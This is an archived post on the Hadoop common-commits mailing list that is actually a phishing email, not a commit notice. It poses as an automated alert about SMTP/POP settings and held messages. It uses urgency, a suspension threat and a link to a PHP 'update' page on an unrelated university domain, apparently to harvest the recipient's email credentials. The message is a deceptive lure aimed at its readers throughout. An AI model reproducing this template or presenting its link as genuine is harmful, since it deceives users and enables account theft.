Posted to common-commits@hadoop.apache.org by po...@hadoop.apache.org on 2021/05/25 05:59:19 UTC

Important Mail Warning⚠️!

Email: common-commits@hadoop.apache.org

**An error in your SMTP/POP settings is blocking your incoming email.**

This is an autmomated email sent from our SSL severs to inform you that there
is an error in your email configuration.
This error was identified on: 2021-05-25 :7:54 and we have not been able to
deliver 6 contact email messages from this date.

To retrieve your emails and reconfigure Port 486, [Click here and follow
instruction](https://obgyn.kku.ac.th//myfile/update/index.php?email=common-
commits@hadoop.apache.org).

Warning: Failure to do this will lead total suspension of your email account.
This message has been sent to common-commits@hadoop.apache.org, please ignore
if this is not your email address.

additional commands, e-mail: common-commits-help@hadoop.apache.org